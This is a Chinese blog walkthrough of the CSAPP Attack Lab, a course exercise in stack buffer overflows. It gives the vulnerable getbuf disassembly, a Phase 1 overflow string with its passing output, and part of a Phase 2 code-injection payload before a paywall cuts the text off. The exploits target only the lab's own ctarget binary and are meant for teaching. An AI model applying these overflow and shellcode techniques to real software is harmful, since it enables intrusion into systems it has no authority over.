CSAPP实验3:Attack Lab

最新推荐文章于 2024-05-03 15:45:34 发布
最新推荐文章于 2024-05-03 15:45:34 发布
阅读量8.7k 收藏 27
点赞数 4
分类专栏: CSAPP实验 文章标签: csapp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch_fu/article/details/78915043
版权

一、资源概览

网站上下载到压缩包target1,解压后包含如下文件:
- README.txt:文件夹中各个文件的介绍。
- ctarget和rtarget:用于进行攻击的可执行文件
- cookie.txt:一个八位十六进制数,有些攻击会用到。
- farm.c:ROP攻击中用到的“gadget farm”的源码。
- hex2raw:用于生成攻击字符串的工具程序。

二、注意事项

  1. 运行ctarget和rtarget时可以使用以下参数:
    • -q:self-study必选参数,避免程序寻找教师的服务器。
    • -h:列出可能的命令行参数
    • -i FILE:从文件读取输入,而非从标准输入

  2. 使用”./hex2raw”将exploit字符串转换为字节码。使用方法参考attack.pdf的Appendix A。简而言之,输入应该为每两个十六进制数一组,用空格进行分隔。比如十六进制0应该写作00,0xdeadbeef应该写作“ef be ad de”。hex2raw的使用方法如下:

    unix> cat exploit.txt | ./hex2raw | ./ctarget
  3. 本实验可以参考CS:APP3e之3.10.3节和3.10.4节。
  4. 使用ret指令实施攻击,所用的地址应该是下列之一:
    • 函数touch1, touch2或touch3的地址
    • 注入代码的地址
    • 从gadget farm中利用的gadgets地址
  5. 从rtarget文件中构造gadgets的时候,地址应该在start_farm和end_farm之间。

  6. 漏洞存在于getbuf函数:无法得知缓冲区是否能容纳读入的字符串。

    unsigned getbuf()
{
    char buf[BUFFER_SIZE];
    Gets(buf);
    return 1;
}

三、Part I: Code Injection Attacks

  • 攻击目标:ctarget
  • ctarget运行时,栈上位置是连续的,所以栈上的数据是可执行的。

Phase 1

  1. 任务:使ctarget从getbuf返回时,执行touch1的代码,而不是返回到test中继续执行。

  2. 建议:

    • 所需信息仅需要反汇编代码。可以用objdump -d
    • 注意字节顺序
    • 使用GDB,在getbuf的最后几步单步调试,确认情况
    • buf在栈帧中的位置取决于编译时的常量BUFFER_SIZE,以及GCC使用的分配策略。需要根据反汇编代码确定buf的位置。

  3. 查看getbuf

    gdb-peda$ disas getbuf
Dump of assembler code for function getbuf:
=> 0x00000000004017a8 <+0>:     sub    rsp,0x28
0x00000000004017ac <+4>:        mov    rdi,rsp
0x00000000004017af <+7>:        call   0x401a40 <Gets>
0x00000000004017b4 <+12>:       mov    eax,0x1
0x00000000004017b9 <+17>:       add    rsp,0x28
0x00000000004017bd <+21>:       ret    
End of assembler dump.

  4. 很容易发现buf的缓冲区大小为0x28,所以填充了40个双字之后,写入的地址就可以覆盖返回地址ret了。记得要把地址后面的0补足了。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
c0 17 40 00 00 00 00 00
  5. Phase 1可以通过了。

    cd@ubuntu:~/pwn/csapp/attackLab$ cat exploit-1.txt | ./hex2raw | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:1:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA C0 17 40 00 00 00 00 00

Phase 2

  1. 任务:使ctarget从getbuf返回时,执行touch2的代码,而不是返回到test中继续执行。并且要将cookie作为参数传递给touch2。

  2. touch2的代码如下:

    void touch2(unsigned val)
{
    vlevel = 2;             /* Part of validation protocol */
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}

  3. 建议:

    • 传递给函数的第一个参数保存在%rdi中。
    • 注入代码应该把寄存器的值设成cookie,然后使用ret指令跳转到touch2。
    • 总是使用ret指令来执行程序的控制转移。

  4. 思考:

    • 注入代码的工作流程如上面的建议所示,首先要把%rdi的值设置为cookie的值,然后使用ret指令跳转到touch2。问题是,第二步怎么才能做到?
    • ret指令的作用:从栈上弹出地址A,然后把PC设置为A。通常书上讲的是call和ret如何配合使用。这里则可以单独利用ret的功能,把touch2的地址压入栈,使其位于栈顶,然后ret指令就会把控制转移到touch2。

  5. exploit-2

    注意!返回地址要用00前缀补齐位数;压入栈的地址要有**一个**00前缀,多余的00会被混入下一条指令,没有00的话下一条指令会被认作地址(gcc会处理好,不要自己乱加或者乱删)。

    48 c7 c7 fa 97 b9 59        /* mov    $0x59b997fa,%rdi */
68 ec 17 40 00              /* pushq  $0x4017ec        */
c3                          /* retq                    */
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc
最低0.47元/天 解锁文章
ch_fu
关注
  • 4
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAPP_LAB:CSAPP实验
03-09
CSAPP_LAB CSAPP实验 数据实验
CSAPP_lab:CSAPP实验
03-08
在这个名为“CSAPP_lab”的项目中,我们可以看到三个具体的实验编号——SE-118、SE-119和SE-120,这可能代表了三个逐步进阶的实验单元。这些实验可能涵盖内存管理、处理器架构、编译器原理、操作系统内核、网络协议...
CSAPP--ATTACKLAB实验
qq_53336526的博客
12-08 6936
武汉大学csapp实验attacklab
2024年网安最全计算机系统基础实训三—AttackLab实验
最新发布
2401_84281629的博客
05-03 1228
强化机器级表示、汇编语言、调试器和逆向工程等方面基础知识,并结合栈帧工作原理实现简单的栈溢出攻击,掌握其基本攻击基本方式和原理,进一步为编程过程中应对栈溢出攻击打下一定的基础。理解缓冲区的工作原理和字符填充过程及其特点。对于无边界检测的语言及其工作方式所造成的缓冲区漏洞加深理解。通过字符串填充的方式,完成5个阶段的缓冲区攻击。分别基于基本返回地址填充、攻击代码填充、ROP等实现这5个难度递增的阶段的缓冲区溢出攻击。
CSAPP 缓冲区溢出实验
poptar的博客
06-06 1970
实验5 缓冲区溢出实验 一、实验目的 1、深入了解缓冲区溢出的隐患,了解如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持、执行非法程序代码,从而造成对程序进行攻击以及破坏的过程; 2、增强对程序机器级表示、汇编语言、调试器和逆向工程等理解。 二、实验内容 对目标程序实施缓冲区溢出攻击,通过造成缓冲区溢出来破坏目标程序的栈帧结构,继而...
【深入理解计算机系统csappattack lab实验
m0_52427832的博客
04-24 5706
文章目录前置知识栈布局以及栈增长方向缓冲区溢出示例准备工作CI:代码注入攻击phase_1phase_2phase_3ROP:面向返回的编程phase_2phase_3参考文章hex2raw的使用生成字节代码 前置知识 栈布局以及栈增长方向 缓冲区溢出示例 准备工作 反汇编两个需要做的文件 objdump -d ctarget > ctarget.txt objdump -d rtarget > rtarget.txt 得到了两个新文件ctarget.txt和rtarget.txt
CSAPPAttackLab
朝花夕拾
11-03 2万+
这份史上最全的CSAPPAttackLab实验讲解汇总绝对是攻克这一难题的最佳利器!无论你是刚刚踏入计算机科学的大门,还是已经是一位经验丰富的程序员,这万字详解都将对你产生深远的影响。从最基础的概念到高级的技巧,每一个步骤都被超全面、超详细地剖析。这篇文章是你攻克CSAPP AttackLab的不二之选,不容错过!收藏它,它将成为你的最佳学习伴侣,引领你通往计算机科学的精彩世界!
csapp实验3-attacklab实验详解
m0_65591847的博客
08-02 731
csappattacklab,很有趣的缓冲区溢出攻击实验
CSAPP_Lab:CSAPP书的实验
04-19
CSAPP_Lab》是基于《Computer Systems: A Programmer's Perspective》(简称CSAPP)这本书的一个实验项目。这本书深入浅出地介绍了计算机系统的底层原理,包括C语言编程、计算机组成、操作系统、网络和安全等方面...
CSAPP-LAB:注释和计算机系统实验室程序员的观点3e
02-04
CSAPP-LAB:注释和计算机系统实验室程序员的观点3e》是针对计算机科学与应用(CSAPP)课程的一份实验指导,旨在帮助学生深入理解操作系统(Operating System)的内部工作原理,特别是从C语言的角度。这个实验室...
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
AttackLab实验-计算机系统基础-gddrxy
03-30
实验原理与内容 “AttackLab”是一个Linux下的可执行C程序,包含了5个阶段(phase1~phase5)的不同内容。程序运行过程中,要求学生能够根据缓冲区的工作方式和程序的反汇编代码来确定攻击字符串长度和字符串中的关键内容。每次成功实现缓冲区溢出攻击时都会有提示相应内容,如果攻击失败则单纯的提示segmentation fault相关信息。 要求攻击字符串的执行不许绕开代码中的validate函数,缓冲区溢出之后对应ret的返回地址可以是以下类型: 1.函数touch1、touch2、touch3的首地址; 2.自行注入的攻击的首地址; 3.在后两个阶段中(ROP攻击),与farm.c的对应的可利用的gadget的起始地址,farm.c对应的机器码已经包含在可执行文件中。可以使用的gadget首地址需处于start_farm和end_farm之间的部分。 注意:前三个阶段使用ctarget作为攻击目标文件,后两个阶段中使用rtarget作为攻击目标文件。 每个阶段考察一个缓冲区溢出方式,难度逐级递增:  阶段1:使用非ROP方式对ctarget进行攻击,调用touc
CSAPP——Lab3——AttackLab
zheyuan的博客
12-02 3484
本篇文章是CSAPP配套实验的第三个,基于缓冲区溢出的攻击实验,和前面的bomb lab同属一章,它们都属于机器级编程这一章的内容,前面的bomb lab是为了阅读和理解汇编语言代码,而这个实验则是为了理解过程调用和x86栈帧结构。 首先还是以吐槽开头,这个实验文件还是从学校系统里下载的,但是很多东西有问题甚至是误导性的。学校将原本的栈缓冲区大小改为了12个字节,并把原版代码包中的hex2raw程序改成了sendstring(迷惑行为,这个函数后来被证明是有问题的),同时做的PPT语焉不详。哦对,这个实验
《深入理解计算机系统》(CSAPP实验四 —— Attack Lab
嵌入式与Linux那些事的博客
12-11 5591
实验目的   本实验要求在两个有着不同安全漏洞的程序上实现五种攻击。通过完成本实验达到: 深入理解当程序没有对缓冲区溢出做足够防范时,攻击者可能会如何利用这些安全漏洞。 深入理解x86-64机器代码的栈和参数传递机制。 深入理解x86-64指令的编码方式。 熟练使用gdb和objdump等调试工具。 更好地理解写出安全的程序的重要性,了解到一些编译器和操作系统提供的帮助改善程序安全性的特性。 做本次实验之前,建议好好阅读下本篇博文 面试官不讲武德,居然让我讲讲蠕虫和金丝雀!,理解缓冲区
CSAPP-AttackLab实验
weixin_52511526的博客
06-06 2979
在程序运行过程中,基于注入攻击代码和面向返回的编程攻击这俩大块内容,通过字符串填充的方式,完成5个阶段的缓冲区攻击。分别基于基本返回地址填充、攻击代码填充、ROP等实现这5个难度递增的阶段的缓冲区溢出攻击。
CSAPPAttack
weixin_42559124的博客
05-28 238
attack-lab 要干啥? 利用漏洞改变./ctarget与./rtarget文件的输出。 怎么干? 运用objdump -d xxx来获取反汇编代码: ctarget: phase1 00000000004017a8 <getbuf>: 4017a8: 48 83 ec 28 sub $0x28,%rsp 4017ac: 48 89 e7 mov %rsp,%rdi 4017af: ...
CSAPP 3e Attack lab
热门推荐
lijun538的专栏
02-17 4万+
总结一下CSAPP第三版的attack lab
Csapp 第三章阅读以及思考
HUXINY的博客
09-10 1509
前言 csapp 第三章从 CPU 的架构入手,了解处理器如何处理指令,并将C程序翻译成汇编,根据汇编和cpu结构讲解你的程序是如何运行的,并讲解常用的数据结构是如何在内存中存储和表示的,通过这些了解计算机系统设计的缺陷以及你的程序运行时出现的奇怪bug(奇怪的错误,以及摸不着头绪的性能低下)的原因。 本片文章,先介绍汇编基础知识。。。。。可以跳读。 重点:常用c表达的汇编表示 数据结构的内存表示......
通过AAPT 进行Android危险权限检测
Qiled的博客
04-13 918
通过AAPT 进行Android危险权限检测 1.基本环境配置 1. ADT环境配置(这边无需Java环境变量) 首先,先用泡妹大法祭出远古版本的ADT 链接:https://pan.baidu.com/s/1lWM0LmVYDYKxWk-LTrRlCw 提取码:pgzx 然后我们就可以开始配置Android开发的环境变量 系统环境变量中添加 ANDROID_HOME=D:\path\androi...
【BUPT计算机系统基础】CSAPP-lab3-缓冲区溢出攻击.docx
11-29
4. 阶段3:开始分析rtarget,寻找适合的ROP链,理解如何在没有完整控制流的情况下构造指令序列。 5. 阶段4和5:继续优化攻击策略,解决更复杂的挑战。 整个实验过程中,学生不仅学习了缓冲区溢出攻击的技术,还提升...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值